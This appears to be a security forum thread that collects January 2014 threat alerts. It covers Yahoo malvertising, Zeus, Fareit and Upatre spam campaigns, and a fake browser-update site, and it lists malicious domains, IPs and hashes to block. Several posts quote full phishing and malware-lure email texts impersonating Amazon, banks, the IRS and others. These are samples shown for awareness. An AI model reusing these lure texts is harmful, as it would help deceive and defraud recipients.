Jan 3, 2014 - "... Clients visiting yahoo.com received advertisements served by ads.yahoo .com. Some of the advertisements are malicious. Those malicious advertisements are iframes... Upon visiting the malicious advertisements users get redirected to a “Magnitude” exploit kit via a HTTP redirect to seemingly random subdomains of:
boxsdiscussing .net
crisisreverse .net
limitingbeyond .net
and others
All those domains are served from a single IP address: 193.169.245.78 *. This IP-address appears to be hosted in the Netherlands. This exploit kit exploits vulnerabilities in Java and installs a host of different malware including:
ZeuS
Andromeda
Dorkbot/Ngrbot
Advertisement clicking malware
Tinba/Zusy
Necurs
The investigation showed that the earliest signs of infection were at December 30, 2013. Other reports suggest it might have started even earlier... it’s unclear why those countries are most affected, it is likely due to the configuration of the malicious advertisements on Yahoo.
> http://foxitsecurity.files.wordpress.com/2014/01/yahoo-ad-distribution.jpg?w=448&h=387
... Block access to the following IP-addresses of the malicious advertisement and the exploit kit:
Block the 192.133.137/24 subnet
Block the 193.169.245/24 subnet
Also closely inspect network traffic for signs of successful exploits for any of the dropped malware. Yahoo is aware of the issue and looking into it.
Please watch this page for updates.
Update: January 3, 1815 (GMT+1): It appears the traffic to the exploit kit has significantly decreased. It looks like Yahoo is taking steps to fix the problem."

* https://www.virustotal.com/en/ip-address/193.169.245.78/information/

- http://help.yahoo.com/kb/index?page=content&y=PROD_FRONT&locale=en_US&id=SLN22569
Update on ads 1/5/14

:fear: :mad: :fear:

AplusWebMaster
2014-01-06, 15:20
FYI...

Fake Amazon account phish
- http://blog.dynamoo.com/2014/01/unauthorized-activity-on-your-amazon.html
6 Jan 2014 - "... new wave of phishing emails, here's a new one looking for Amazon credentials.
Date: Mon, 6 Jan 2014 08:19:39 -0000 [03:19:39 EST]
From: Amazon [noreply@ trysensa .com]
Case- 91289-90990
Unauthorized Activity on your Amazon account.
We recently confirmed that you had unauthorized activity on your Amazon account.
Please be assured that because your card includes "zero-liability fraud protection" , you are not responsible for unauthorized use of your card.
Unfortunately, we have not confirmed your complete information , please follow the instructions below.
Click the link below to validate your account information using our secure server:
Click Here To Active Your Amazon Account
For your protection, you must verify this activity before you can continue using your account
Thank You.
Amazon LTD Security System

The link in the email goes to [donotclick]immedicenter .com/immedicenter/images/yootheme/menu/Amazon/index.php and comes up with a convincing-looking Amazon login page:
> http://2.bp.blogspot.com/-NtFM6bDPGL4/UsqVU6VUT5I/AAAAAAAACYk/vN_Mb3KZDis/s1600/amazon-login-1.png
The next page phishes for even more information... it goes after your credit card information... then gets sent to the genuine Amazon .com website. In most email clients, floating over the link would clearly demonstrate that this was not the legitimate amazon.com website, and certainly once visited (not something I would recommend) then the address bar at the top of the browser would clearly indicate it is -not- amazon .com. If you have accidentally clicked through this email and provided all the details then you should contact your bank immediately and also change your Amazon password plus any other places that you use that same username/password combination."
___

The $9.84 Credit Card Hustle
- http://krebsonsecurity.com/2014/01/deconstructing-the-9-84-credit-card-hustle/
Jan 6, 2014 - "Over the holidays, I heard from a number of readers who were seeing strange, unauthorized charges showing up on their credit and debit cards for $9.84... repeatedly advised readers to keep a close eye on their bank statements for -bogus- transactions. It’s still not clear how consumers’ card numbers are being stolen here, but the fraud appears to stem from an elaborate network of affiliate schemes that stretch from Cyprus to India and the United Kingdom. One reader said the $9.84 charge on her card came with a notation stating the site responsible was eetsac .com. I soon discovered that there are -dozens- of sites complaining about similar charges from similarly-constructed domains; for example, this 30-page thread* at Amazon’s customer help forums includes gripes from hundreds of people taken by this scam.
> http://krebsonsecurity.com/wp-content/uploads/2014/01/homecs.png
... A closer look at some of those domains reveals a few interesting facts. Callscs .in, for example, is a Web site for a call center and a domain that has been associated with these $9.84 fraudulent charges. Callscs .in lists as its local phone number 43114300. That number traces back to a call center in India, Call Connect India, Inc., which registers its physical address as Plot No 82, Sector 12 A, Dwarka. New Delhi – 110075... this is not a new type of fraud, nor is this particular fraud a recent occurrence — although the bogus $9.84 charges do appear to have spiked around the holidays. Most of the domains involved in this scheme were registered a year ago or more, and a quick search on the amount $9.84 shows that the fraudsters responsible for this scheme have been at it since at least the first half of 2013. If you see a charge like this or any other activity on your credit or debit card that you did not authorize, contact your bank and report the fraud immediately. I think it’s also a good idea in cases like this to request a new card in the odd chance your bank doesn’t offer it: After all, it’s a good bet that your card is in the hands of crooks, and is likely to be abused like this again..."
(More detail at the krebsonsecurity URL above.)
* http://www.amazon.com/gp/help/customer/forums/ref=cm_cd_pg_oldest?ie=UTF8&authToken=&cdForum=Fx2NFGOONPZEXIP&cdPage=1&cdSort=newest&cdThread=Tx2EME4IL59BUP4

> http://www.scambook.com/search?search=IAWCS.COM&sort=relevance
___

Zeus spoofing Bitdefender AV ...
- http://www.webroot.com/blog/2014/01/06/zeus-infection-spoofing-bit-defender-av/
Jan 6, 2014 - "... noticed a large amount of -Zeus- infections that are -spoofing- the Bitdefender name. While infections spoofing AV companies aren’t unusual, it’s been a while since we have seen such a spike on one particular vendor in such a short time period. Most of the names are slight variations, but the numbers are impressive – Overall, we have seen 40,000 unique MD5s in the last week alone! The infection being dropped is from the Zeus family of infections, which are banking Trojans designed to steal login information when the user logs into their online banking website... This infection can get onto a user’s PC via a number of different methods, but the most common is through an exploit kit. The commonly used Blackhole exploit kit uses Java exploits to drop and execute a file. Unless the user is very alert, they typically won’t even notice they are infected. Once executed, the infection will try a number of methods to make sure it is automatically run on start-up... the infection may connect to a remote server and receive updates and it can also download other infections (Cryptolocker/ICE and other Rogue AVs)... Due to the infection route of this particular infection, it is advisable to have the latest version of Java installed and preferably use a modern secure browser with the latest Windows updates installed. The latest build of Firefox disables Java plugins by default, which should help stop this particular attack vector... this infection has also been seen to be spread by email... Always be alert to any email attachments, even if they’re from friends/relatives, and especially executable files that are inside a zip file..."

:fear::fear: :mad:

AplusWebMaster
2014-01-07, 13:07
FYI...

Spam... trends of 2013
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-year-of-spam-the-notable-trends-of-2013/
Jan 7, 2014 - "... still saw traditional types of spam, we also saw several “improvements” which allowed spammers to avoid detection and victimize more users. We also saw spam utilized more to carry malware since the start of the year.
Spam volume from 2008...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/2013-spam-volume.jpg
... In 2013, we saw 198 BHEK spam campaigns, a smaller number compared to the previous year... In this particular spam run, the volume of spammed messages reached up to 0.8% of all spam messages collected during the time period.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/2013-BHEK.jpg
... The number of BHEK spam runs dwindled until there was none in December... the use of malware attachments remains constant in the threat landscape. This suggests that there are users who still fall prey to simple techniques (such as urging users to click on an attachment). We noticed that the number of spam with malicious attachments fluctuated throughout the year, before it steadily increased in the latter months.
Volume of spam messages with -malicious- attachments
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/spam-malware-attachment.jpg
From the first to third quarter of the year, ZBOT/ZeuS was the top malware family distributed by spam. This family is known for stealing financial-related information. Halfway into the third quarter, however, we noticed that TROJ_UPATRE* unseated ZBOT and became the top malware attachment. In November, about 45% of all malicious spam with attachments contained UPATRE malware. UPATRE became notorious for downloading other malware, including ZBOT malware and ransomware, particularly CryptoLocker. This type of attack is doubly risky for users because not only will their information be stolen, their files will also become inaccessible..."
* http://about-threats.trendmicro.com/us/malware/TROJ_UPATRE.VNA
___

64-bit ZBOT leverages Tor - improves evasion techniques
- http://blog.trendmicro.com/trendlabs-security-intelligence/64-bit-zbot-leverages-tor-improves-evasion-techniques/
Jan 7, 2014 - "... we have confirmed that several ZBOT 32-bit samples (detected as TSPY_ZBOT.AAMV) do have an embedded 64-bit version (detected as TSPY64_ZBOT.AANP). However, our investigation also led us to confirm other noteworthy routines of the malware, including its antimalware evasion techniques... Like any ZBOT variant, TSPY_ZBOT.AAMV injects its code into the normal process explorer.exe. If the running process is 64-bit, the malware then loads the 64-bit version of the malware. If not, it will continue to execute the 32-bit version. The other notable feature of this ZBOT variant is its Tor component, which can hide the malware’s communication to its command-and-control (C&C) servers... This 64-bit version for ZeuS/ZBOT is an expected progression for the malware, especially after ZeuS source code was leaked back in 2011. Since then, we have seen several reincarnations of the malware, most notably in the form of KINS and its involvement with other malware such as Cryptolocker and UPATRE. Adding other functionalities such as rootkit capability and the use of a Tor component are further proof that we can see more modifications in the future, particularly those that help circumvent or delay antimalware efforts..."
___

Wells Fargo Important Documents Spam
- http://threattrack.tumblr.com/post/72579411468/wells-fargo-important-documents-spam
Jan 7, 2014 - "Subjects Seen:
ATTN: Important Bank Documents
Typical e-mail details:
We have received this documents from your bank, please review attached documents.
Lanny Hester
Wells Fargo Advisors

Malicious File Name and MD5:
BankDocs-4F17B9844A.zip (1A493400DBDE62CC64AB2FC97985F07B)
BankDocuments_FE0274A4593F58683C1949896834F32939859835947694653298321744361597236489231640913264.pdf.exe (8F24720E4D08C986C0FE07A66CCF8380)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7a3955f21a2e5cf1833d2538b6a7b5fc/tumblr_inline_mz1s1nPzwB1r6pupn.png

Tagged: wells fargo, Upatre
___

‘Adobe License Service Center Order NR’ and ‘Notice to appear in court’ themed malicious spam ...
- http://www.webroot.com/blog/2014/01/07/adobe-license-service-center-order-nr-notice-appear-court-themed-malicious-spam-campaigns-intercepted-wild/
Jan 7, 2014 - "... Despite the lack of blog updates over the Holidays, we continued to intercept malicious campaigns over the same period of time, proving that the bad guys never take holidays... The first campaign successfully impersonates Adobe’s License Service Center, in an attempt to trick users into thinking that they’ve successfully purchased a Creative Suite 6 Design Standard software license key.
Sample screenshot of the first spamvertised campaign:
> https://www.webroot.com/blog/wp-content/uploads/2014/01/Adobe_License_Service_Center_Spam_Spamvertised_Malware_Malicious_Software_Social_Engineering1.png
Detection rate for the spamvertised attachment: MD5: 10dbbaaceda4dce944ebb9c777f24066 * TrojanDownloader:Win32/Kuluoz.D.
The second campaign attempts to trick users into thinking that they’ve received a notice to appear in court.
Sample screenshot of the spamvertised attachment:
> https://www.webroot.com/blog/wp-content/uploads/2014/01/Chicago_Court_Spam_Spamvertised_Malware_Malicious_Software_Social_Engineerig1.png
Detection rate for the spamvertised attachment: MD5: c77ca2486d1517b511973ad1c923bb7d ** TrojanDownloader:Win32/Kuluoz.D; Backdoor.Win32.Androm.bket.
Once executed the sample phones back to:
... 109.169.87.141... also known to have responded to 200.98.141.0 ... Two more MD5s are known to have responded to the same C&C IP in the past..."
* https://www.virustotal.com/en/file/d5ec477dc0b39867b39a56b9ca7652c8ea115533583d8b6211c1e4f53537bbb2/analysis/1389006917/

** https://www.virustotal.com/en/file/bc55a78b008cce2102f3679adc4694211cf61710e2bcf49391365928a0e96519/analysis/1389008875/

:fear::fear: :mad:

AplusWebMaster
2014-01-08, 17:11
FYI...

More malicious "Voice Message from Unknown" SPAM
- http://blog.dynamoo.com/2014/01/more-voice-message-from-unknown-spam.html
8 Jan 2014 - "Another bunch of fake "voice message" spams with a malicious payload are doing the rounds, for example:
Subject: Voice Message from Unknown (996-743-6568)
Subject: Voice Message from Unknown (433-358-8977)
Subject: Voice Message from Unknown (357-973-7738)
Body:
- - -Original Message- - -
From: 996-743-6568
Sent: Wed, 8 Jan 2014 12:06:38 +0000
To: [redacted]
Subject: Important Message to All Employees

Attached is a file VoiceMessage.zip which in turn contains VoiceMessage.exe which has a VirusTotal detection rate of 11/47*. Automated analysis tools... show an attempted connection to casbir .com .au on 67.22.142.68 (Cologlobal, Canada). This appears to be the only server on this IP address, so blocking or monitoring it for the time being may be prudent."
* https://www.virustotal.com/en-gb/file/040ffe7e91bf3f640e62bea1deea85280256eff407c6c176d63b730731eda2dd/analysis/1389191399/
___

jConnect Fax Spam
- http://threattrack.tumblr.com/post/72662543973/jconnect-fax-spam
Jan 8, 2014 - "Subjects Seen:
jConnect fax from “<phone number>” - 21 page(s), Caller-ID: <phone number>
Typical e-mail details:
Fax Message [Caller-ID: <phone number>]
You have received a 21 page(s) fax at 2012-12-17 05:25:32 EST.
* The reference number for this fax is lax3_did10-1514386087-4062628129-11.
This message can be opened using your PDF reader. If you have not already installed j2 Messenger, download it for free: j2.com/downloads
Please visit j2 .com/help if you have any questions regarding this message or your j2 service.
Thank you for using jConnect!

Malicious File Name and MD5:
FAX_93-238738192_19.zip (3A8CAA5972CF72CCEB0C40531C28B5AB)
FAX_93-238738192_19.exe (CA2628B955CAC2C8B6BD9F8C4C504FA4)

Screenshot: https://31.media.tumblr.com/245418432179a0bd5297d62bf564f010/tumblr_inline_mz375kXLm51r6pupn.png

Tagged: jconnect, Upatre
___

LinkedIn Makes Federal Case Out of Fake Accounts
- http://blogs.wsj.com/digits/2014/01/07/linkedin-makes-federal-case-out-of-fake-accounts/
Jan 7, 2014 - "LinkedIn, the business-focused social network, charged in a federal civil lawsuit that 10 unnamed people had created thousands of fake accounts that can be used to pass on malicious computer code or puff up users’ profiles. In a suit filed Monday in U.S. District Court for the Northern District of California, LinkedIn said it had deleted the abusive accounts and traced them to an Amazon Web Services account. It’s asking the cloud computing giant to hand over the names of the owners of the web-services accounts. Amazon Web Services offers computing power for rent via the Internet. An Amazon spokeswoman did not immediately respond to a request for comment. LinkedIn accuses the unnamed people of violating its user agreement by creating multiple fake accounts that stole data from legitimate LinkedIn profiles through a method called scraping*..."
* http://www.hotforsecurity.com/blog/linkedin-files-lawsuit-against-fake-account-creators-7594.html
Jan 8, 2014 - "... In November, Bitdefender warned about fake LinkedIn profiles that gather personal details** and lead users to dangerous websites..."
** http://www.hotforsecurity.com/blog/alluring-fake-recruiters-entice-linkedin-users-with-attractive-job-offers-7362.html
Nov 21, 2013 - "... As many users speak English and a native language, the scam aims at most countries in the world especially the US, where over 84 million users are active on LinkedIn. The fake recruiter spreads the link to the scam using URL shortening techniques. The bogus profile of “Annabella Erica” was already injected into authentic LinkedIn groups such as Global Jobs Network, which includes 167,000 users worldwide. Members of the social network are now sharing insights on more than 2.1 million groups, so the number of victims exposed to the scam could be a lot higher. The fake employment website is registered on a reputable “.com” domain to avoid raising doubts as to its authenticity. Scammers gather e-mail addresses and passwords they may later use for identity theft. Fraudsters usually register websites for longer periods and sometimes make their pages look even better than legitimate websites..."
___

inTuit/TurboTax phish
- http://security.intuit.com/alert.php?a=95
1/7/14 - "Here is a copy of the phishing email people are receiving. Be sure -not- to open the attachment.

TurboTax Alert: Your $4,120.55 Tax Refund!
> http://security.intuit.com/images/ttphish.jpg
Dear Customer,
You've received a Tax Refund of $4,120.55.
Kindly find attached file to view your Refund Confirmation from TurboTax.
Please keep this refund confirmation for your records.
NOTE: TurboTax/IRS will not request your banking details through email, sms or telephone.
Thank you for using TurboTax

This is the end of the -fake- email.
Steps to Take Now:
Do -not- open the email attachment...
Delete the email."

:mad: :fear:

AplusWebMaster
2014-01-09, 07:26
FYI...

Fake Browser update site installs Malware
- http://www.symantec.com/connect/blogs/fake-browser-update-site-installs-malware
9 Jan 2014 - "In the first week of 2014, we came across a website using tried and tested social engineering techniques to coerce victims into installing malware. The domain http ://newyear[REMOVED]fix .com was registered on Dec 30, 2013. Based on our research, 94 percent of attacks appear to be targeting users based in the United Kingdom through advertising networks and free movie streaming and media sites... This particular social engineering attack is not novel, and plays on victims’ fear of needing to install urgent updates. Since the domain was registered only last week, it appears the attacker thought of this scheme at the very last minute, as the holiday season starts winding down. The website, which is hosted in the -Ukraine-, uses a dual hybrid Web server setup of Apache and Nginx, with the latter identifying the victim’s browser and performing a redirect. The user will see the Google Chrome, Mozilla Firefox, and Microsoft Internet Explorer templates...
Page displayed to Chrome users
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Fake%20Browser%20Update%201.png
Page displayed to Firefox users
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Fake%20Browser%20Update%202.png
Page displayed to Internet Explorer users
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Fake%20Browser%20Update%203.png
JavaScript loop button which requires 100 clicks to close
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Fake%20Browser%20Update%204.png
At the time of this blog post, the Internet Explorer version of the Web page is no longer functional. The Chrome download page serves up Chromeupdate.exe while the Firefox download page serves up Firefoxupdate.exe. Both of these samples are detected by Symantec as Trojan.Shylock*..."
* http://www.symantec.com/security_response/writeup.jsp?docid=2011-092916-1617-99
___

Spam Overdose Yields Fareit, Zeus and Cryptolocker
- http://www.f-secure.com/weblog/archives/00002655.html
Jan 9, 2014 - "... massive spam surge with the same subjects and attachments in our spam traps.
>> http://www.f-secure.com/weblog/archives/emails.PNG
>>> http://www.f-secure.com/weblog/archives/emailstats.png
The binary attachment is a threat that is often referred to as Fareit. Fareit is known to steal information such as credentials and account information from installed FTP clients and cryptocurrency wallets, and stored passwords in browsers. For the two samples coming from these spam, we've seen them connecting to these to send information:
• networksecurityx .hopto .org
• 188.167.38.131
• 94.136.131.2
• 66.241.103.146
• 37.9.50.200
In addition to stealing data, these samples download other malware including Zeus P2P... Other malware seen installed in the system was Cryptolocker.
> http://www.f-secure.com/weblog/archives/btc.PNG
... Samples are detected as Trojan.Pws.Tepfer and Trojan.GenericKD variants."

- http://google.com/safebrowsing/diagnostic?site=hopto.org/

- https://www.virustotal.com/en/ip-address/188.167.38.131/information/

- https://www.virustotal.com/en/ip-address/94.136.131.2/information/

- https://www.virustotal.com/en/ip-address/66.241.103.146/information/

- https://www.virustotal.com/en/ip-address/37.9.50.200/information/
___

JPMorgan Chase SecureMail Spam
- http://threattrack.tumblr.com/post/72770317229/jpmorgan-chase-securemail-spam
Jan 9, 2014 - "Subjects Seen:
You have a new encrypted message from JPMorgan Chase & CO.
Typical e-mail details:
You have received a secure e-mail message from JPMorgan Chase & CO..
We care about your privacy, JPMorgan Chase & CO. uses this secure way to exchange e-mails containing personal information.
Read your secure message by opening the attachment. You will be prompted to save (download) it to your computer.
If you have concerns about the validity of this message, please contact the sender directly.
First time users - will need to register after opening the attachment.

Malicious File Name and MD5:
Secureinformation.zip (19CCB0B5FCF8D707671E5F98AC475D36)
Secureinformation.exe (7F81501C468FF358DE1DA5B1F1AD150B)

Screenshot: https://31.media.tumblr.com/84b205b1c95963599c75ad1a8f504e2b/tumblr_inline_mz54fwHloB1r6pupn.png

Tagged: Chase, Upatre
___

IRS Tax Return Spam
- http://threattrack.tumblr.com/post/72779324288/irs-tax-return-spam
Jan 9, 2014 - "Subjects Seen:
IRS: Early 2013 Tax Return Report!
Typical e-mail details:
Dear Member
Here is a report on your early 2013 Federal Tax return report. Kindly download the attachment to view your report and start filling for 2013 return as early as second week of December.
Thanks
Internal Revenue Service

Malicious File Name and MD5:
Early2013TaxReturnReport_D0E7937B80.zip (E76B91B9010AE7ABDC264380B95BF86D)
Early2013TaxReturnReport_983456948574980572398456324965984573984509324.pdf.exe (FE20A23BEC91B7EC1E301B571CE91100)

Screenshot: https://31.media.tumblr.com/a5c84027cb11ed21a4ec12d0754733b1/tumblr_inline_mz5ak6wRXE1r6pupn.png

Tagged: IRS, Fareit
___

- http://blog.mxlab.eu/2014/01/09/email-attn-early-2013-tax-return-report-contains-trojan/

- https://www.virustotal.com/en/file/bcbd43ec615225cede44318677c65f89c9113705c4cd7f975ea3d4c327a18bd5/analysis/
Early2013TaxReturnReport_ ...
Analysis date: 2014-01-10 12:55:07 UTC

- https://malwr.com/analysis/YzgyZWQzMDI2YjRjNGZlNTg3MzYwY2Y1OTU4MDdhODQ/

:fear: :mad:

AplusWebMaster
2014-01-10, 19:33
FYI...

Fake Bank Statement SPAM
- http://threattrack.tumblr.com/post/72870666524/bank-statement-spam
Jan 10, 2014 - "Subjects Seen:
Bank Statement. Please read
Typical e-mail details:
Hello <email name>,
I attached the December Invoice that contains the Property Tax and the other document showing the details mentioned below.
I am at your disposal for any further question.
Waiting for your instructions concerning the document attached.
Goldie Oliver

Malicious File Name and MD5:
USBank_December_2013_17F9968085.zip (5A2E558A7DC17998A11A0FBFB34AACF9)
USBank - December 2013_ID39485394562093456309847589346598237598320471237481923427583450.pdf.exe (2089EAC526883C98D67D399449B461DB)

Screenshot: https://31.media.tumblr.com/66b87ad8c326f8dd4df1ae31ff410018/tumblr_inline_mz6x0jV1p11r6pupn.png

Tagged: Bank Statement, Fareit
___

Junk Mail vs Scam Mail
- http://www.bbb.org/blog/2014/01/junk-mail-vs-scam-mail/
Jan 10, 2014 - "Many of the items sent to consumers' in-boxes these days are little more than junk mail. But BBB warns a growing number of spam emails are designed to inflict harm. While it may seem like this topic comes up frequently, unfortunately, scammers find a way to catch users off guard. Right after the Target store hacking of some 40 million credit and debit cards, BBB issued a warning* about emails claiming to be from Target but were disguised as malware designed to steal identity information. The warning was issued in light of all the scam emails on the internet right now. The hard part is telling the difference between a legitimate email from a vendor you do subscribe to and one that looks like the vendor but isn’t... Check for misspellings and grammatical errors. Silly mistakes and sloppy copy – for example, an area code that doesn’t match an address – often are giveaways that the site is a scam. Messaging like, “Just tell us where to send this $1,100” -or- “a delivery was cancelled because of problems with the mailing address and to please provide a correct address” is another giveaway. Companies typically do not use this type of language. A recent trend in scam emails is asking users to select a link on a state where they are to send the money or to send the correct address. This link will then lead to a site where a thief will use the information for their own use. It isn’t wise to select the links or open attachments in emails you aren’t familiar with, especially ones you haven’t solicited. When in doubt, check with the company before you respond to any website that asks you to enter personal identifying information. Bottom line, unless you’ve done business with the company or are on a mailing list with them – do -not- click on email links even if they appear to be from legitimate companies. Far too many times these days, it’s all just a scam."
* http://www.bbb.org/blog/2014/01/watch-for-scams-following-target-data-breach/
___

Google linking of social network contacts to email raises concerns
- http://www.reuters.com/article/2014/01/10/us-google-gmail-idUSBREA081NH20140110
Jan 9, 2014 - "A new feature in Google Inc's Gmail will result in some users receiving messages from people with whom they have not shared their email addresses, raising concerns among some privacy advocates. The change, which Google announced on Thursday, broadens the list of contacts available to Gmail users so it includes both the email addresses of their existing contacts, as well as the names of people on the Google+ social network. As a result, a person can send an email directly to friends, and strangers, who use Google+. Google is increasingly trying to integrate its Google+, a two-and-a-half-year old social network that has 540 million active users, with its other services. When consumers sign up for Gmail, the company's Web-based email service, they are now automatically given a Google+ account. Google said the new feature will make it easier for people who use both services to communicate with their friends... Some privacy advocates said Google should have made the new feature "opt-in," meaning that users should explicitly agree to receive messages from other Google+ users, rather than being required to manually change the setting... A Google spokeswoman said the company planned to send an email to all Google+ users during the next two days alerting them to the change and explaining how to change their settings..."

:fear: :mad: :sad:

AplusWebMaster
2014-01-12, 17:25
FYI...

Sefnit-added Tor service ...
- https://net-security.org/malware_news.php?id=2673
Jan 10, 2014 - "... the Sefnit click-fraud Trojan... has been around since 2009... This rapid rise in Tor connections has served to see just how many computers were infected with the malware, and the number was staggering: over four million. Since then, Microsoft has been working to diminish that number... Microsoft has decided to retroactively clean the machines that still had the Sefnit-added Tor service, and practically managed to do so for half of them - around 2 million - in just two months...
> http://www.net-security.org/images/articles/ms-10012014-big.jpg
... two million cleaned computers is better than none, two million more remain at risk... In order to help these users, Microsoft has compiled a short step-by-step guide* on how to do it..."
* http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botnet-tor-hazard.aspx
9 Jan 2014

:fear::fear:

AplusWebMaster
2014-01-13, 18:38
FYI...

Fake Dept. of Treasury SPAM
- http://blog.dynamoo.com/2014/01/department-of-treasury-notice-of.html
13 Jan 2014 - "This US Treasury spam (but apparently sent from salesforce .com) has a malicious attachment:
Date: Mon, 13 Jan 2014 18:54:16 +0700 [06:54:16 EST]
From: "support@salesforce .com" [support@salesforce .com]
Subject: Department of Treasury Notice of Outstanding Obligation - Case H6SYVMK704BX4AL
Important please review and sign the attached document!
We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.
In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue. Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.
Questions should be directed to the Federal Service Desk ...

Attached is a file FMS-Case-H6SYVMK704BX4AL.zip (VirusTotal detection rate 7/47*) which in turn contains a malicious executable FMS-Case-{_Case_DIG}.exe (detection rate also 7/47**)... analysis shows an attempted connection to anggun.my .id on 38.99.253.234 (Cogent, US). This seems to be the only domain on that server, blocking either may be prudent."
* https://www.virustotal.com/en-gb/file/abbfbaadd5ea95647e9c79e2a7cfc87bd84dab8849c7a2ad4c70c9fd8f07c001/analysis/1389622089/

** https://www.virustotal.com/en-gb/file/2b992fd40c86b615b6e91c186eed79714493c77d0588fe59e3f01dbcbe8bcbb0/analysis/1389622087/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Financial Tips Attachment Email Messages - 2014 Jan 13
Fake Account Payment Information Email Messages - 2014 Jan 13
Fake Court Appearance Request Email Messages - 2014 Jan 13
Fake Product Catalog Email Messages - 2014 Jan 13
Fake Company Complaint Email Messages - 2014 Jan 13
Fake Bank Account Statement Email Messages - 2014 Jan 13
Fake Package Tracking Information Email Messages - 2014 Jan 13
Fake Payroll Invoice Email Messages - 2014 Jan 13
Fake Bank Payment Notification Email Messages - 2014 Jan 13
Fake Invoice Statement Attachment Email Messages - 2014 Jan 13
(More detail and links at the cisco URL above.)

:fear: :mad:

AplusWebMaster
2014-01-14, 21:32
FYI...

Fake HSBC SPAM / Payment Advice.exe
- http://blog.dynamoo.com/2014/01/hsbc-payment-advice-spam-payment.html
14 Jan 2014 - "This -fake- HSBC spam comes with a malicious attachment:
Date: Tue, 14 Jan 2014 11:57:29 -0300 [09:57:29 EST]
From: HSBC Advising Service [advising.service.738805677.728003.693090157@ mail.hsbcnet.hsbc .com]
Subject: Payment Advice - Advice Ref:[G72282154558] / Priority payment / Customer Ref:[63 434S632U9I]
Sir/Madam
The attached payment advice is issued at the request of our customer. The advice is for your reference only.
Yours faithfully
Global Payments and Cash Management
HSBC ...

There is an attachment Payment Advice [G72282154558].zip which contains an executable Payment Advice.exe with a VirusTotal detection rate of 12/48*. Automated analysis... shows an attempted connection to thebostonshaker .com on 206.190.147.139 (Salt Lake City Hosting, US). It is the only site on this IP address, blocking either temporarily may give some protection."
* https://www.virustotal.com/en-gb/file/3bfd83deba0221db8d741b4492d5487245a8a50156d302aa0d2fe8ee4f368b70/analysis/1389713473/
___

Unsolicited SPAM...
- http://blog.dynamoo.com/2014/01/uncensored-download-spam-leads-to-adware.html
14 Jan 2014 - "... plagued with these over the past few days, emails coming in with the following subjects:
Underground XXX files
Free porno torrents
Uncensored download
The body text contains just a link to [donotclick]goinst .com/download/getfile/1205000/0/?q=Uncensored%20download
In turn this downloads a file Uncensored download__3516_i263089565_il6090765.exe and of course that's about as trustworthy as a van with "FREE CANDY" ... A quick look at the EXE in VirusTotal* indicates that it's some sort of Adware, probably pay-per-install. An examination of the binary shows a digital signature for Shetef Solutions & Consulting (1998) Ltd who are probably -not- behind the spam run, but are probably inadvertently paying the spammers for installations. Avoid."
* https://www.virustotal.com/en-gb/file/b998d160881aa19487888014cf12e276ba55b54d3405b45699cf507b7acda416/analysis/1389715495/
___

More WhatsApp Message Spam
- http://threattrack.tumblr.com/post/73312753221/whatsapp-message-spam
Jan 14, 2014 - Subjects Seen:
Missed voice message, “4:27”PM
Typical e-mail details:
New voicemessage.
Please download attached file
Description
Jan 09 2:44PM PM
08 seconds

Malicious File Name and MD5:
Missed-message.zip (687C8BE7F4A56A00AF03ED9DFC3BFB76)
Missed-message.exe (BF1411F18EA12E058BFB05692E422216)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ede2bd7794acfb19f8ead1a762f1ed8e/tumblr_inline_mzefht1KF81r6pupn.png

Tagged: WhatsApp, Upatre
___

Fake ADP invoice w/ Fiserv document - TROJAN
- http://blog.mxlab.eu/2014/01/14/genvariant-strictor-49180-trojan-attached-to-emails-regarding-adp-invoice-and-fiserv-document/
Jan 14, 2014 - "... intercepting different types of emails with an attached Gen:Variant.Strictor.49180.
> ADP Invoice - This email is sent from the spoofed address “payroll.invoices@ adp .com” while the SMTP from is “fraud@ aexp .com”, comes with the subject “Invoice #3164342” and has the following body:
Attached is the invoice (Invoice_ADP_3164342.zip) received from your bank.
Please print this label and fill in the requested information. Once you have filled out
all the information on the form please send it to payroll.invoices@ adp. com.
For more details please see the attached file.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you ,
Automatic Data Processing, Inc...
The attached ZIP file has the name Invoice_ADP_3164342.zip and contains the 19 kB large file Invoice_ADP_01142014.exe.

> Fiserv attached document - This email is sent from the spoofed address “Fiserv <Debra_Drake@ fiserv .com>” while the SMTP from is “fraud@ aexp .com”, comes with the subject “FW: Scanned Document Attached” and has the following body:
Dear Business Associate:
Protecting the privacy and security of client, company, and employee
information is one of our highest priorities. That is why Fiserv has
introduced the Fiserv Secure E-mail Message Center – a protected e-mail
environment designed to keep sensitive and confidential information
safe. In this new environment, Fiserv will be able to send e-mail
messages that you retrieve on a secured encrypted file.
You have an important message from Debra_Drake@ fiserv .com. To see your message, use the following password to decrypt attached file: JkSIbsJPPai
If this is your first time receiving a secure file from the
Fiserv Secure E-mail Message Center, you will be prompted to set up a
user name and password... If you have any questions, please contact your Fiserv representative...
The attached ZIP file has the name FSEMC.Debra_Drake.zip and contains the 19 kB large file FSEMC_01142014.exe. The trojan is known as Gen:Variant.Strictor.49180 by most of the virus engines but also as PWSZbot-FMO!5B171D420618, Heuristic.LooksLike.Win32.Suspicious.J!81, TrojanDownloader:Win32/Upatre.A or PE:Malware.FakePDF@CV!1.9C28. At the time of writing, 12 of the 48 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/88f4cae7b769ce0eb2ad50aff40d5832cd3c9e3bca10aee5b10d088d2347bb92/analysis/

